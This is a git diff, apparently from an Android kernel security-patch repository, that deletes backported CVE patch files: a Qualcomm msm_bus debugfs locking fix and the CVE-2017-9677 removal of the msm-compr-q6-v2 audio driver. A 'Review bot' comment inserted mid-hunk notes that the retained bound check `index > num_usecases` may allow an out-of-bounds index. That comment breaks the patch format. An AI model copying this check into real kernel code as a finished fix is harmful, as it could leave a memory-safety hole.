rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - } - - static int msm_bus_dbg_record_client(const struct msm_bus_scale_pdata *pdata, -@@ -429,7 +446,9 @@ static int msm_bus_dbg_record_client(const struct msm_bus_scale_pdata *pdata, - cldata->clid = clid; - cldata->file = file; - cldata->size = 0; -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_add_tail(&cldata->list, &cl_list); -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - return 0; - } - -@@ -437,6 +456,7 @@ static void msm_bus_dbg_free_client(uint32_t clid) - { - struct msm_bus_cldata *cldata = NULL; - -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (cldata->clid == clid) { - debugfs_remove(cldata->file); -@@ -445,6 +465,7 @@ static void msm_bus_dbg_free_client(uint32_t clid) - break; - } - } -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - } - - static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata, -@@ -456,6 +477,7 @@ static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata, - struct timespec ts; - int found = 0; - -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (cldata->clid == clid) { - found = 1; -@@ -463,11 +485,14 @@ static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata, - } - } - -- if (!found) -+ if (!found) { -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - return -ENOENT; -+ } - - if (cldata->file == NULL) { - if (pdata->name == NULL) { -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - MSM_BUS_DBG("Client doesn't have a name\n"); - return -EINVAL; - } -@@ -515,19 +540,9 @@ static int msm_bus_dbg_fill_cl_buffer(const struct msm_bus_scale_pdata *pdata, - - cldata->index = index; - cldata->size = i; -- return i; --} -- --static int msm_bus_dbg_update_request(struct msm_bus_cldata *cldata, int index) --{ -- int ret = 0; -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - -- if ((index < 0) || (index > cldata->pdata->num_usecases)) { -- 
MSM_BUS_DBG("Invalid index!\n"); -- return -EINVAL; -- } -- ret = msm_bus_scale_client_update_request(cldata->clid, index); -- return ret; -+ return i; - } - - static ssize_t msm_bus_dbg_update_request_write(struct file *file, -@@ -539,19 +554,26 @@ static ssize_t msm_bus_dbg_update_request_write(struct file *file, - char *chid; - char *buf = kmalloc((sizeof(char) * (cnt + 1)), GFP_KERNEL); - int found = 0; -+ uint32_t clid; -+ ssize_t res = cnt; - - if (!buf || IS_ERR(buf)) { - MSM_BUS_ERR("Memory allocation for buffer failed\n"); - return -ENOMEM; - } -- if (cnt == 0) -- return 0; -- if (copy_from_user(buf, ubuf, cnt)) -- return -EFAULT; -+ if (cnt == 0) { -+ res = 0; -+ goto out; -+ } -+ if (copy_from_user(buf, ubuf, cnt)) { -+ res = -EFAULT; -+ goto out; -+ } - buf[cnt] = '\0'; - chid = buf; - MSM_BUS_DBG("buffer: %s\n size: %zu\n", buf, sizeof(ubuf)); - -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (strnstr(chid, cldata->pdata->name, cnt)) { - found = 1; -@@ -562,21 +584,35 @@ static ssize_t msm_bus_dbg_update_request_write(struct file *file, - if (ret) { - MSM_BUS_DBG("Index conversion" - " failed\n"); -- return -EFAULT; -+ rt_mutex_unlock( -+ &msm_bus_dbg_cllist_lock); -+ res = -EFAULT; -+ goto out; - } - } else { - MSM_BUS_DBG("Error parsing input. 
Index not" - " found\n"); - found = 0; - } -+ if ((index < 0) || -+ (index > cldata->pdata->num_usecases)) { -+ MSM_BUS_DBG("Invalid index!\n"); -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); -+ res = -EINVAL; -+ goto out; -+ } -+ clid = cldata->clid; - break; - } - } -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - - if (found) -- msm_bus_dbg_update_request(cldata, index); -+ msm_bus_scale_client_update_request(clid, index); -+ -+out: - kfree(buf); -- return cnt; -+ return res; - } - - /** -@@ -599,8 +635,10 @@ static ssize_t fabric_data_read(struct file *file, char __user *buf, - break; - } - } -- if (!found) -+ if (!found) { -+ mutex_unlock(&msm_bus_dbg_fablist_lock); - return -ENOENT; -+ } - bsize = fablist->size; - ret = simple_read_from_buffer(buf, count, ppos, - fablist->buffer, bsize); -@@ -689,8 +727,10 @@ static int msm_bus_dbg_fill_fab_buffer(const char *fabname, - break; - } - } -- if (!found) -+ if (!found) { -+ mutex_unlock(&msm_bus_dbg_fablist_lock); - return -ENOENT; -+ } - - if (fablist->file == NULL) { - MSM_BUS_DBG("Fabric dbg entry does not exist\n"); -@@ -741,6 +781,8 @@ static ssize_t msm_bus_dbg_dump_clients_read(struct file *file, - "\nDumping curent client votes to trace log\n"); - if (*ppos) - goto exit_dump_clients_read; -+ -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (IS_ERR_OR_NULL(cldata->pdata)) - continue; -@@ -756,6 +798,7 @@ static ssize_t msm_bus_dbg_dump_clients_read(struct file *file, - cldata->pdata->active_only); - } - } -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - exit_dump_clients_read: - return simple_read_from_buffer(buf, count, ppos, msg, cnt); - } -@@ -880,6 +923,7 @@ static int __init msm_bus_debugfs_init(void) - goto err; - } - -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry(cldata, &cl_list, list) { - if (cldata->pdata) { - if (cldata->pdata->name == NULL) { -@@ -899,6 +943,7 @@ static int __init msm_bus_debugfs_init(void) - &client_data_fops); - } 
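Review bot: The range check moved inline into msm_bus_dbg_update_request_write keeps the upper bound as `index > cldata->pdata->num_usecases`, which accepts `index == num_usecases`. If use cases are indexed from 0 to `num_usecases - 1` (the array and msm_bus_scale_client_update_request are not shown, so this needs confirming), a value written to this debugfs file can select one entry past the end, and the check should be `(index < 0) || (index >= cldata->pdata->num_usecases)`. The check is also reached from the "Index not found" branch, where nothing was parsed into `index`. The function starts before this hunk.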
- } -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); - - if (debugfs_create_file("dump_clients", S_IRUGO | S_IWUSR, - clients, NULL, &msm_bus_dbg_dump_clients_fops) == NULL) -@@ -911,6 +956,7 @@ static int __init msm_bus_debugfs_init(void) - if (fablist->file == NULL) { - MSM_BUS_DBG("Cannot create files for commit data\n"); - kfree(rules_buf); -+ mutex_unlock(&msm_bus_dbg_fablist_lock); - goto err; - } - } -@@ -930,10 +976,14 @@ static void __exit msm_bus_dbg_teardown(void) - struct msm_bus_cldata *cldata = NULL, *cldata_temp; - - debugfs_remove_recursive(dir); -+ -+ rt_mutex_lock(&msm_bus_dbg_cllist_lock); - list_for_each_entry_safe(cldata, cldata_temp, &cl_list, list) { - list_del(&cldata->list); - kfree(cldata); - } -+ rt_mutex_unlock(&msm_bus_dbg_cllist_lock); -+ - mutex_lock(&msm_bus_dbg_fablist_lock); - list_for_each_entry_safe(fablist, fablist_temp, &fabdata_list, list) { - list_del(&fablist->list); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-9677/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9677/3.10/0001.patch deleted file mode 100644 index a367d6ff..00000000 --- a/Patches/Linux_CVEs/CVE-2017-9677/3.10/0001.patch +++ /dev/null 
@@ -1,1858 +0,0 @@ -From b62291edb424281ed31a4e15140b16972ce9eef1 Mon Sep 17 00:00:00 2001 -From: Xiaojun Sang -Date: Thu, 27 Apr 2017 14:44:25 +0800 -Subject: ASoC: msm: remove unused msm-compr-q6-v2 - -msm-compr-q6-v2.c and msm-compr-q6-v2.h are no longer used. - -CRs-Fixed: 2022953 -Bug: 62379475 -Change-Id: I856d90a212a3e123a2c8b80092aff003f7c608c7 -Signed-off-by: Xiaojun Sang ---- - sound/soc/msm/apq8084-i2s.c | 2 +- - sound/soc/msm/apq8084.c | 2 +- - sound/soc/msm/msm8226.c | 2 +- - sound/soc/msm/msm8974.c | 2 +- - sound/soc/msm/msm8994.c | 2 +- - sound/soc/msm/qdsp6v2/Makefile | 2 +- - sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 1707 ------------------------------- - sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h | 36 - - 8 files changed, 6 insertions(+), 1749 deletions(-) - delete mode 100644 sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c - delete mode 100644 sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h - -diff --git a/sound/soc/msm/apq8084-i2s.c b/sound/soc/msm/apq8084-i2s.c -index 794aa25..5897e9c 100644 ---- a/sound/soc/msm/apq8084-i2s.c -+++ b/sound/soc/msm/apq8084-i2s.c -@@ -1826,7 +1826,7 @@ static struct snd_soc_dai_link apq8084_dai_links[] = { - .name = "APQ8084 Compr8", - .stream_name = "COMPR8", - .cpu_dai_name = "MultiMedia8", -- .platform_name = "msm-compr-dsp", -+ .platform_name = "msm-compress-dsp", - .dynamic = 1, - .trigger = {SND_SOC_DPCM_TRIGGER_POST, - SND_SOC_DPCM_TRIGGER_POST}, -diff --git a/sound/soc/msm/apq8084.c b/sound/soc/msm/apq8084.c -index aa2e25f..2b02e5d 100644 ---- a/sound/soc/msm/apq8084.c -+++ b/sound/soc/msm/apq8084.c -@@ -3046,7 +3046,7 @@ static struct snd_soc_dai_link apq8084_common_dai_links[] = { - .name = "APQ8084 Compr8", - .stream_name = "COMPR8", - .cpu_dai_name = "MultiMedia8", -- .platform_name = "msm-compr-dsp", -+ .platform_name = "msm-compress-dsp", - .dynamic = 1, - .async_ops = ASYNC_DPCM_SND_SOC_PREPARE - | ASYNC_DPCM_SND_SOC_HW_PARAMS, -diff --git a/sound/soc/msm/msm8226.c b/sound/soc/msm/msm8226.c -index 4095c12..113d77b 
100644 ---- a/sound/soc/msm/msm8226.c -+++ b/sound/soc/msm/msm8226.c -@@ -1495,7 +1495,7 @@ static struct snd_soc_dai_link msm8226_common_dai[] = { - .name = "MSM8226 Compr8", - .stream_name = "COMPR8", - .cpu_dai_name = "MultiMedia8", -- .platform_name = "msm-compr-dsp", -+ .platform_name = "msm-compress-dsp", - .dynamic = 1, - .trigger = {SND_SOC_DPCM_TRIGGER_POST, - SND_SOC_DPCM_TRIGGER_POST}, -diff --git a/sound/soc/msm/msm8974.c b/sound/soc/msm/msm8974.c -index fd69611..4cfd7c3 100644 ---- a/sound/soc/msm/msm8974.c -+++ b/sound/soc/msm/msm8974.c -@@ -2164,7 +2164,7 @@ static struct snd_soc_dai_link msm8974_common_dai_links[] = { - .name = "MSM8974 Compr8", - .stream_name = "COMPR8", - .cpu_dai_name = "MultiMedia8", -- .platform_name = "msm-compr-dsp", -+ .platform_name = "msm-compress-dsp", - .dynamic = 1, - .trigger = {SND_SOC_DPCM_TRIGGER_POST, - SND_SOC_DPCM_TRIGGER_POST}, -diff --git a/sound/soc/msm/msm8994.c b/sound/soc/msm/msm8994.c -index 1285c59..8678fb1 100644 ---- a/sound/soc/msm/msm8994.c -+++ b/sound/soc/msm/msm8994.c -@@ -2684,7 +2684,7 @@ static struct snd_soc_dai_link msm8994_common_dai_links[] = { - .name = "MSM8994 Compr8", - .stream_name = "COMPR8", - .cpu_dai_name = "MultiMedia8", -- .platform_name = "msm-compr-dsp", -+ .platform_name = "msm-compress-dsp", - .dynamic = 1, - .trigger = {SND_SOC_DPCM_TRIGGER_POST, - SND_SOC_DPCM_TRIGGER_POST}, -diff --git a/sound/soc/msm/qdsp6v2/Makefile b/sound/soc/msm/qdsp6v2/Makefile -index 5865eb9..41f3984 100644 ---- a/sound/soc/msm/qdsp6v2/Makefile -+++ b/sound/soc/msm/qdsp6v2/Makefile -@@ -1,5 +1,5 @@ - snd-soc-qdsp6v2-objs += msm-dai-q6-v2.o msm-pcm-q6-v2.o msm-pcm-routing-v2.o \ -- msm-compress-q6-v2.o msm-compr-q6-v2.o \ -+ msm-compress-q6-v2.o \ - msm-pcm-lpa-v2.o \ - msm-pcm-afe-v2.o msm-pcm-voip-v2.o \ - msm-pcm-voice-v2.o msm-dai-q6-hdmi-v2.o \ -diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -deleted file mode 100644 -index 5fe5f24..0000000 ---- 
a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -+++ /dev/null -@@ -1,1707 +0,0 @@ --/* Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved. -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License version 2 and -- * only version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. -- */ -- -- --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include -- --#include -- --#include "msm-compr-q6-v2.h" --#include "msm-pcm-routing-v2.h" --#include "audio_ocmem.h" --#include -- --#define COMPRE_CAPTURE_NUM_PERIODS 16 --/* Allocate the worst case frame size for compressed audio */ --#define COMPRE_CAPTURE_HEADER_SIZE (sizeof(struct snd_compr_audio_info)) --/* Changing period size to 4032. 
4032 will make sure COMPRE_CAPTURE_PERIOD_SIZE -- * is 4096 with meta data size of 64 and MAX_NUM_FRAMES_PER_BUFFER 1 -- */ --#define COMPRE_CAPTURE_MAX_FRAME_SIZE (4032) --#define COMPRE_CAPTURE_PERIOD_SIZE ((COMPRE_CAPTURE_MAX_FRAME_SIZE + \ -- COMPRE_CAPTURE_HEADER_SIZE) * \ -- MAX_NUM_FRAMES_PER_BUFFER) --#define COMPRE_OUTPUT_METADATA_SIZE (sizeof(struct output_meta_data_st)) --#define COMPRESSED_LR_VOL_MAX_STEPS 0x20002000 -- --#define MAX_AC3_PARAM_SIZE (18*2*sizeof(int)) --#define AMR_WB_BAND_MODE 8 --#define AMR_WB_DTX_MODE 0 -- -- --const DECLARE_TLV_DB_LINEAR(compr_rx_vol_gain, 0, -- COMPRESSED_LR_VOL_MAX_STEPS); --struct snd_msm { -- atomic_t audio_ocmem_req; --}; --static struct snd_msm compressed_audio; -- --static struct audio_locks the_locks; -- --static struct snd_pcm_hardware msm_compr_hardware_capture = { -- .info = (SNDRV_PCM_INFO_MMAP | -- SNDRV_PCM_INFO_BLOCK_TRANSFER | -- SNDRV_PCM_INFO_MMAP_VALID | -- SNDRV_PCM_INFO_INTERLEAVED | -- SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME), -- .formats = SNDRV_PCM_FMTBIT_S16_LE, -- .rates = SNDRV_PCM_RATE_8000_48000, -- .rate_min = 8000, -- .rate_max = 48000, -- .channels_min = 1, -- .channels_max = 8, -- .buffer_bytes_max = -- COMPRE_CAPTURE_PERIOD_SIZE * COMPRE_CAPTURE_NUM_PERIODS , -- .period_bytes_min = COMPRE_CAPTURE_PERIOD_SIZE, -- .period_bytes_max = COMPRE_CAPTURE_PERIOD_SIZE, -- .periods_min = COMPRE_CAPTURE_NUM_PERIODS, -- .periods_max = COMPRE_CAPTURE_NUM_PERIODS, -- .fifo_size = 0, --}; -- --static struct snd_pcm_hardware msm_compr_hardware_playback = { -- .info = (SNDRV_PCM_INFO_MMAP | -- SNDRV_PCM_INFO_BLOCK_TRANSFER | -- SNDRV_PCM_INFO_MMAP_VALID | -- SNDRV_PCM_INFO_INTERLEAVED | -- SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME), -- .formats = SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE, -- .rates = SNDRV_PCM_RATE_8000_48000 | SNDRV_PCM_RATE_KNOT, -- .rate_min = 8000, -- .rate_max = 48000, -- .channels_min = 1, -- .channels_max = 8, -- .buffer_bytes_max = 1024 * 1024, -- 
.period_bytes_min = 128 * 1024, -- .period_bytes_max = 256 * 1024, -- .periods_min = 4, -- .periods_max = 8, -- .fifo_size = 0, --}; -- --/* Conventional and unconventional sample rate supported */ --static unsigned int supported_sample_rates[] = { -- 8000, 11025, 12000, 16000, 22050, 24000, 32000, 44100, 48000 --}; -- --/* Add supported codecs for compress capture path */ --static uint32_t supported_compr_capture_codecs[] = { -- SND_AUDIOCODEC_AMRWB --}; -- --static struct snd_pcm_hw_constraint_list constraints_sample_rates = { -- .count = ARRAY_SIZE(supported_sample_rates), -- .list = supported_sample_rates, -- .mask = 0, --}; -- --static bool msm_compr_capture_codecs(uint32_t req_codec) --{ -- int i; -- pr_debug("%s req_codec:%d\n", __func__, req_codec); -- if (req_codec == 0) -- return false; -- for (i = 0; i < ARRAY_SIZE(supported_compr_capture_codecs); i++) { -- if (req_codec == supported_compr_capture_codecs[i]) -- return true; -- } -- return false; --} -- --static void compr_event_handler(uint32_t opcode, -- uint32_t token, uint32_t *payload, void *priv) --{ -- struct compr_audio *compr = priv; -- struct msm_audio *prtd = &compr->prtd; -- struct snd_pcm_substream *substream = prtd->substream; -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct audio_aio_write_param param; -- struct audio_aio_read_param read_param; -- struct audio_buffer *buf = NULL; -- phys_addr_t temp; -- struct output_meta_data_st output_meta_data; -- uint32_t *ptrmem = (uint32_t *)payload; -- int i = 0; -- int time_stamp_flag = 0; -- int buffer_length = 0; -- int stop_playback = 0; -- -- pr_debug("%s opcode =%08x\n", __func__, opcode); -- switch (opcode) { -- case ASM_DATA_EVENT_WRITE_DONE_V2: { -- uint32_t *ptrmem = (uint32_t *)¶m; -- pr_debug("ASM_DATA_EVENT_WRITE_DONE\n"); -- pr_debug("Buffer Consumed = 0x%08x\n", *ptrmem); -- prtd->pcm_irq_pos += prtd->pcm_count; -- if (atomic_read(&prtd->start)) -- snd_pcm_period_elapsed(substream); -- else -- if 
(substream->timer_running) -- snd_timer_interrupt(substream->timer, 1); -- atomic_inc(&prtd->out_count); -- wake_up(&the_locks.write_wait); -- if (!atomic_read(&prtd->start)) { -- atomic_set(&prtd->pending_buffer, 1); -- break; -- } else -- atomic_set(&prtd->pending_buffer, 0); -- -- /* -- * check for underrun -- */ -- snd_pcm_stream_lock_irq(substream); -- if (runtime->status->hw_ptr >= runtime->control->appl_ptr) { -- runtime->render_flag |= SNDRV_RENDER_STOPPED; -- stop_playback = 1; -- } -- snd_pcm_stream_unlock_irq(substream); -- -- if (stop_playback) { -- pr_err("underrun! render stopped\n"); -- break; -- } -- -- buf = prtd->audio_client->port[IN].buf; -- pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n", -- __func__, prtd->pcm_count, prtd->out_head); -- temp = buf[0].phys + (prtd->out_head * prtd->pcm_count); -- pr_debug("%s:writing buffer[%d] from 0x%pa\n", -- __func__, prtd->out_head, &temp); -- -- if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE) -- time_stamp_flag = SET_TIMESTAMP; -- else -- time_stamp_flag = NO_TIMESTAMP; -- memcpy(&output_meta_data, (char *)(buf->data + -- prtd->out_head * prtd->pcm_count), -- COMPRE_OUTPUT_METADATA_SIZE); -- -- buffer_length = output_meta_data.frame_size; -- pr_debug("meta_data_length: %d, frame_length: %d\n", -- output_meta_data.meta_data_length, -- output_meta_data.frame_size); -- pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n", -- output_meta_data.timestamp_msw, -- output_meta_data.timestamp_lsw); -- if (buffer_length == 0) { -- pr_debug("Recieved a zero length buffer-break out"); -- break; -- } -- param.paddr = temp + output_meta_data.meta_data_length; -- param.len = buffer_length; -- param.msw_ts = output_meta_data.timestamp_msw; -- param.lsw_ts = output_meta_data.timestamp_lsw; -- param.flags = time_stamp_flag; -- param.uid = prtd->session_id; -- for (i = 0; i < sizeof(struct audio_aio_write_param)/4; -- i++, ++ptrmem) -- pr_debug("cmd[%d]=0x%08x\n", i, *ptrmem); -- if 
(q6asm_async_write(prtd->audio_client, -- ¶m) < 0) -- pr_err("%s:q6asm_async_write failed\n", -- __func__); -- else -- prtd->out_head = -- (prtd->out_head + 1) & (runtime->periods - 1); -- break; -- } -- case ASM_DATA_EVENT_RENDERED_EOS: -- pr_debug("ASM_DATA_CMDRSP_EOS\n"); -- if (atomic_read(&prtd->eos)) { -- pr_debug("ASM_DATA_CMDRSP_EOS wake up\n"); -- prtd->cmd_ack = 1; -- wake_up(&the_locks.eos_wait); -- atomic_set(&prtd->eos, 0); -- } -- break; -- case ASM_DATA_EVENT_READ_DONE_V2: { -- pr_debug("ASM_DATA_EVENT_READ_DONE\n"); -- pr_debug("buf = %pK, data = 0x%X, *data = %pK,\n" -- "prtd->pcm_irq_pos = %d\n", -- prtd->audio_client->port[OUT].buf, -- *(uint32_t *)prtd->audio_client->port[OUT].buf->data, -- prtd->audio_client->port[OUT].buf->data, -- prtd->pcm_irq_pos); -- -- memcpy(prtd->audio_client->port[OUT].buf->data + -- prtd->pcm_irq_pos, (ptrmem + READDONE_IDX_SIZE), -- COMPRE_CAPTURE_HEADER_SIZE); -- pr_debug("buf = %pK, updated data = 0x%X, *data = %pK\n", -- prtd->audio_client->port[OUT].buf, -- *(uint32_t *)(prtd->audio_client->port[OUT].buf->data + -- prtd->pcm_irq_pos), -- prtd->audio_client->port[OUT].buf->data); -- if (!atomic_read(&prtd->start)) -- break; -- pr_debug("frame size=%d, buffer = 0x%X\n", -- ptrmem[READDONE_IDX_SIZE], -- ptrmem[READDONE_IDX_BUFADD_LSW]); -- if (ptrmem[READDONE_IDX_SIZE] > COMPRE_CAPTURE_MAX_FRAME_SIZE) { -- pr_err("Frame length exceeded the max length"); -- break; -- } -- buf = prtd->audio_client->port[OUT].buf; -- -- pr_debug("pcm_irq_pos=%d, buf[0].phys = 0x%pa\n", -- prtd->pcm_irq_pos, &buf[0].phys); -- read_param.len = prtd->pcm_count - COMPRE_CAPTURE_HEADER_SIZE; -- read_param.paddr = buf[0].phys + -- prtd->pcm_irq_pos + COMPRE_CAPTURE_HEADER_SIZE; -- prtd->pcm_irq_pos += prtd->pcm_count; -- -- if (atomic_read(&prtd->start)) -- snd_pcm_period_elapsed(substream); -- -- q6asm_async_read(prtd->audio_client, &read_param); -- break; -- } -- case APR_BASIC_RSP_RESULT: { -- switch (payload[0]) { -- case 
ASM_SESSION_CMD_RUN_V2: { -- if (substream->stream -- != SNDRV_PCM_STREAM_PLAYBACK) { -- atomic_set(&prtd->start, 1); -- break; -- } -- if (!atomic_read(&prtd->pending_buffer)) -- break; -- pr_debug("%s: writing %d bytes of buffer[%d] to dsp\n", -- __func__, prtd->pcm_count, prtd->out_head); -- buf = prtd->audio_client->port[IN].buf; -- pr_debug("%s: writing buffer[%d] from 0x%pa head %d count %d\n", -- __func__, prtd->out_head, &buf[0].phys, -- prtd->pcm_count, prtd->out_head); -- if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE) -- time_stamp_flag = SET_TIMESTAMP; -- else -- time_stamp_flag = NO_TIMESTAMP; -- memcpy(&output_meta_data, (char *)(buf->data + -- prtd->out_head * prtd->pcm_count), -- COMPRE_OUTPUT_METADATA_SIZE); -- buffer_length = output_meta_data.frame_size; -- pr_debug("meta_data_length: %d, frame_length: %d\n", -- output_meta_data.meta_data_length, -- output_meta_data.frame_size); -- pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n", -- output_meta_data.timestamp_msw, -- output_meta_data.timestamp_lsw); -- param.paddr = buf[prtd->out_head].phys -- + output_meta_data.meta_data_length; -- param.len = buffer_length; -- param.msw_ts = output_meta_data.timestamp_msw; -- param.lsw_ts = output_meta_data.timestamp_lsw; -- param.flags = time_stamp_flag; -- param.uid = prtd->session_id; -- param.metadata_len = COMPRE_OUTPUT_METADATA_SIZE; -- if (q6asm_async_write(prtd->audio_client, -- ¶m) < 0) -- pr_err("%s:q6asm_async_write failed\n", -- __func__); -- else -- prtd->out_head = -- (prtd->out_head + 1) -- & (runtime->periods - 1); -- atomic_set(&prtd->pending_buffer, 0); -- } -- break; -- case ASM_STREAM_CMD_FLUSH: -- pr_debug("ASM_STREAM_CMD_FLUSH\n"); -- prtd->cmd_ack = 1; -- wake_up(&the_locks.flush_wait); -- break; -- default: -- break; -- } -- break; -- } -- default: -- pr_debug("Not Supported Event opcode[0x%x]\n", opcode); -- break; -- } --} -- --static int msm_compr_send_ddp_cfg(struct audio_client *ac, -- struct snd_dec_ddp *ddp) --{ -- int i, 
rc; -- pr_debug("%s\n", __func__); -- for (i = 0; i < ddp->params_length/2; i++) { -- rc = q6asm_ds1_set_endp_params(ac, ddp->params_id[i], -- ddp->params_value[i]); -- if (rc) { -- pr_err("sending params_id: %d failed\n", -- ddp->params_id[i]); -- return rc; -- } -- } -- return 0; --} -- --static int msm_compr_playback_prepare(struct snd_pcm_substream *substream) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data; -- struct msm_audio *prtd = &compr->prtd; -- struct snd_pcm_hw_params *params; -- struct asm_aac_cfg aac_cfg; -- uint16_t bits_per_sample = 16; -- int ret; -- -- struct asm_softpause_params softpause = { -- .enable = SOFT_PAUSE_ENABLE, -- .period = SOFT_PAUSE_PERIOD, -- .step = SOFT_PAUSE_STEP, -- .rampingcurve = SOFT_PAUSE_CURVE_LINEAR, -- }; -- struct asm_softvolume_params softvol = { -- .period = SOFT_VOLUME_PERIOD, -- .step = SOFT_VOLUME_STEP, -- .rampingcurve = SOFT_VOLUME_CURVE_LINEAR, -- }; -- -- pr_debug("%s\n", __func__); -- -- params = &soc_prtd->dpcm[substream->stream].hw_params; -- if (runtime->format == SNDRV_PCM_FORMAT_S24_LE) -- bits_per_sample = 24; -- -- ret = q6asm_open_write_v2(prtd->audio_client, -- compr->codec, bits_per_sample); -- if (ret < 0) { -- pr_err("%s: Session out open failed\n", -- __func__); -- return -ENOMEM; -- } -- msm_pcm_routing_reg_phy_stream( -- soc_prtd->dai_link->be_id, -- prtd->audio_client->perf_mode, -- prtd->session_id, -- substream->stream); -- /* -- * the number of channels are required to call volume api -- * accoridngly. 
So, get channels from hw params -- */ -- if ((params_channels(params) > 0) && -- (params_periods(params) <= runtime->hw.channels_max)) -- prtd->channel_mode = params_channels(params); -- -- ret = q6asm_set_softpause(prtd->audio_client, &softpause); -- if (ret < 0) -- pr_err("%s: Send SoftPause Param failed ret=%d\n", -- __func__, ret); -- ret = q6asm_set_softvolume(prtd->audio_client, &softvol); -- if (ret < 0) -- pr_err("%s: Send SoftVolume Param failed ret=%d\n", -- __func__, ret); -- -- ret = q6asm_set_io_mode(prtd->audio_client, -- (COMPRESSED_IO | ASYNC_IO_MODE)); -- if (ret < 0) { -- pr_err("%s: Set IO mode failed\n", __func__); -- return -ENOMEM; -- } -- -- prtd->pcm_size = snd_pcm_lib_buffer_bytes(substream); -- prtd->pcm_count = snd_pcm_lib_period_bytes(substream); -- prtd->pcm_irq_pos = 0; -- /* rate and channels are sent to audio driver */ -- prtd->samp_rate = runtime->rate; -- prtd->channel_mode = runtime->channels; -- prtd->out_head = 0; -- atomic_set(&prtd->out_count, runtime->periods); -- -- if (prtd->enabled) -- return 0; -- -- switch (compr->info.codec_param.codec.id) { -- case SND_AUDIOCODEC_MP3: -- /* No media format block for mp3 */ -- break; -- case SND_AUDIOCODEC_AAC: -- pr_debug("%s: SND_AUDIOCODEC_AAC\n", __func__); -- memset(&aac_cfg, 0x0, sizeof(struct asm_aac_cfg)); -- aac_cfg.aot = AAC_ENC_MODE_EAAC_P; -- aac_cfg.format = 0x03; -- aac_cfg.ch_cfg = runtime->channels; -- aac_cfg.sample_rate = runtime->rate; -- ret = q6asm_media_format_block_aac(prtd->audio_client, -- &aac_cfg); -- if (ret < 0) -- pr_err("%s: CMD Format block failed\n", __func__); -- break; -- case SND_AUDIOCODEC_AC3: { -- struct snd_dec_ddp *ddp = -- &compr->info.codec_param.codec.options.ddp; -- pr_debug("%s: SND_AUDIOCODEC_AC3\n", __func__); -- ret = msm_compr_send_ddp_cfg(prtd->audio_client, ddp); -- if (ret < 0) -- pr_err("%s: DDP CMD CFG failed\n", __func__); -- break; -- } -- case SND_AUDIOCODEC_EAC3: { -- struct snd_dec_ddp *ddp = -- 
&compr->info.codec_param.codec.options.ddp; -- pr_debug("%s: SND_AUDIOCODEC_EAC3\n", __func__); -- ret = msm_compr_send_ddp_cfg(prtd->audio_client, ddp); -- if (ret < 0) -- pr_err("%s: DDP CMD CFG failed\n", __func__); -- break; -- } -- default: -- return -EINVAL; -- } -- -- prtd->enabled = 1; -- prtd->cmd_ack = 0; -- prtd->cmd_interrupt = 0; -- -- return 0; --} -- --static int msm_compr_capture_prepare(struct snd_pcm_substream *substream) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- struct audio_buffer *buf = prtd->audio_client->port[OUT].buf; -- struct snd_codec *codec = &compr->info.codec_param.codec; -- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data; -- struct audio_aio_read_param read_param; -- uint16_t bits_per_sample = 16; -- int ret = 0; -- int i; -- -- prtd->pcm_size = snd_pcm_lib_buffer_bytes(substream); -- prtd->pcm_count = snd_pcm_lib_period_bytes(substream); -- prtd->pcm_irq_pos = 0; -- -- if (runtime->format == SNDRV_PCM_FORMAT_S24_LE) -- bits_per_sample = 24; -- -- if (!msm_compr_capture_codecs( -- compr->info.codec_param.codec.id)) { -- /* 